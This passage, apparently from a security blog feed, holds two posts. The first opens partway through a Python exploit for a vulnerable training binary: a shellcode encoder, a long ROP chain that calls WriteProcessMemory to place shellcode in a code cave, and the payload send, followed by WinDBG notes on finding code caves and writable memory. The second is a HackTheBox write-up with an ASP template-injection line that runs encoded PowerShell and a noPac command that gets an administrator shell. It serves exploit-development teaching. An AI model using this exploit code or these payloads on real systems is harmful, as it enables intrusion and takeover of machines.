	badchars =     [ 0x0, 0x1 ,0x2 ,0x3 ,0x4 ,0x5 ,0x6, 0x7, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x20, 0x2F, 0x5C]   
	replacements = []
	encoding_offset = -0x55
	for c in badchars:
		new = c + encoding_offset
		if new < 0:
			  new += 256
		replacements.append(new)

	print(f"Badchars: {badchars}")
	print(f"Replacements: {replacements}")
	badchars = bytes(badchars)
	replacements = bytes(replacements)

	input("Paused")
	transTable = sc.maketrans(badchars, replacements)
	sc = sc.translate(transTable)
	return sc

sc = encode_shellcode(sc)
print(f"Amount of bad chars in sc: {len(bad_indices)}")

pivot = p32(binary_base + 0x11396)  # add esp,0xD60  
writeable = 0xa635a + binary_base
codecave =  0x1010 + binary_base

skeleton = [
	0x41414141, # WriteProcessMemory address (IAT WriteFile + offset)
	codecave,   # Shellcode Return Address
	0xffffffff, # Pseudo process handle to current process (-1)
	codecave,   # Code cave address (write where)
	0x42424242, # dummy lpBuffer (write what) 
	0x43434343, # dummy nSize
	writeable,  # lpNumberOfBytesWritten
]

rop_setup = [
	# Get a pointer to the skeleton
	0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
	writeable,
	0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
	0x704F4 + binary_base,  # pop eax; ret;
	0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7609f + binary_base,  # add eax, 4; ret;
	0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
	0x41414141,
	0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
	0x41414141,

	# Write WriteProcessMemory address to skeleton+0
	0x704F4 + binary_base,	# pop eax; ret;
	0x9015C + binary_base,	# IAT WriteFile
	0x2BB8E + binary_base,  # mov eax, dword ptr [eax] // dereference IAT to get lib ptr
	0x636a2 + binary_base, 	# pop edx; ret;
	0xfffee370, 			# -00011c90, offset from WriteFile to WriteProcessMemory
	0x59a05 + binary_base, 	# sub eax, edx; pop ebp; ret;
	0x41414141,
	0x7ab35 + binary_base, 	# mov dword ptr [ecx], eax; pop ebp; ret;

	# Move skeleton pointer ahead (the first entry is consumed by the preceding pop ebp, so ecx advances by 16)
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 4
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 8
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 12
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 16
	0x0582b + binary_base, # inc ecx; ret 0;

	# Write shellcode address to skeleton dummy value
	0x16238 + binary_base, # mov eax, ecx; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
	0x41414141,
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x7ab35 + binary_base, # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	# Write size (0x401) to skeleton dummy value
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x704F4 + binary_base,  # pop eax
	0x19b3  + binary_base,  # addr of 0x401;
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	 # Move ecx back to skeleton & pivot stack there to execute the function
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x8b299 + binary_base, 	# mov esp, ecx; ret;
]

rop1 = b""
# add skeleton
for g in skeleton:
	  rop1 += p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop1)-4, 4):
	  rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

rop2 = b""
rop2 += p32(binary_base + 0x159d)*(10) # ropnop
for g in rop_setup:
	print(hex(g))
	rop2 += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += rop2
buf += sc
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close() 

Misc

Finding a codecave

A codecave is an (executable) memory area of a binary that is unused and can be used to host attacker-provided code. We can find the code section as follows:

0:001> dd filesrv + 3c L1
3fab003c  000000f8
0:001> dd filesrv + f8 + 2c L1
3fab0124  00001000
0:001> ? filesrv+1000
Evaluate expression: 1068175360 = 3fab1000
0:001> !vprot 3fab1000
BaseAddress:       3fab1000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        0008f000
State:             00001000  MEM_COMMIT
Protect:           00000020  PAGE_EXECUTE_READ
Type:              01000000  MEM_IMAGE

Now we can use some unused area between 3fab1000 and 3fab1000+0008f000=3fb40000. A good place to look is towards the end, but really you can use anything if you are confident the binary does not crash when you overwrite it, or if you don't care.
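
The two `dd` commands above follow the PE header layout: the dword at offset 0x3c of the image is e_lfanew (the offset of the PE header), and the dword at e_lfanew + 0x2c is BaseOfCode. The same lookup can be done offline on a copy of the binary. The sketch below is illustrative only: `base_of_code` is a hypothetical helper, and it runs against a synthetic header filled with the values from the WinDBG session instead of the real file.

```python
import struct


def base_of_code(image: bytes) -> int:
    """Read BaseOfCode (RVA of the code section) from a PE image."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # 4 (signature) + 20 (COFF header) + 20 (into optional header) = 0x2c
    return struct.unpack_from("<I", image, e_lfanew + 0x2C)[0]


# Synthetic header that mirrors the values seen in the debugger.
image = bytearray(0x200)
struct.pack_into("<I", image, 0x3C, 0xF8)
image[0xF8:0xFC] = b"PE\x00\x00"
struct.pack_into("<I", image, 0xF8 + 0x2C, 0x1000)

image_base = 0x3FAB0000
code_start = image_base + base_of_code(bytes(image))
code_end = code_start + 0x8F000        # RegionSize reported by !vprot

print(hex(code_start), hex(code_end))
```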

Finding a writable address

Often you need writable addresses when calling Windows API functions because they return data that way. To find one, we can look at the .data section and choose something that is likely not used:

!dh filesrv
...
SECTION HEADER #3
   .data name
    332C virtual size
   A6000 virtual address
    1E00 size of raw data
   A5400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
...
0:001> ? filesrv + A6000 + 332C + 4
Evaluate expression: 1068864304 = 3fb59330
0:001> dd 3fb59330
3fb59330  00000000 00000000 00000000 00000000
!vprot 3fb59330
BaseAddress:       3fb59000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        00001000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              01000000  MEM_IMAGE

Finding ROP Gadgets

I had a lot of success with ropper and its interactive console. Another good alternative is rp++.

References

This binary was used for a vulnerable machine on the vulndev discord server that is available for patreon subscribers.

The post Bypassing DEP with WriteProcessMemory (x86) appeared first on Vulndev.

ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox

By: xct
29 January 2022 at 14:45

We are solving Anubis, a 50-point Windows machine on HackTheBox which involves an ASP template injection, Windows containers, and stealing hashes with Responder. Later we'll escalate privileges using noPAC.

Notes

ASP Injection

<% CreateObject("WScript.Shell").Exec("powershell -enc ...") %>

noPAC

# https://github.com/Ridter/noPac
proxychains -q crackmapexec smb 172.31.48.1 -u localadmin -p 'Secret123!' --no-bruteforce
sudo date -s "$(curl -sI https://windcorp.htb -k | grep -i '^date:'|cut -d' ' -f2-)"
proxychains -q python3 noPac.py windcorp.htb/localadmin:'Secret123' -dc-ip 172.31.48.1 -dc-host EARTH -shell --impersonate administrator

The post ASP, Windows Containers, Responder & NoPAC – Anubis @ HackTheBox appeared first on Vulndev.

❌
❌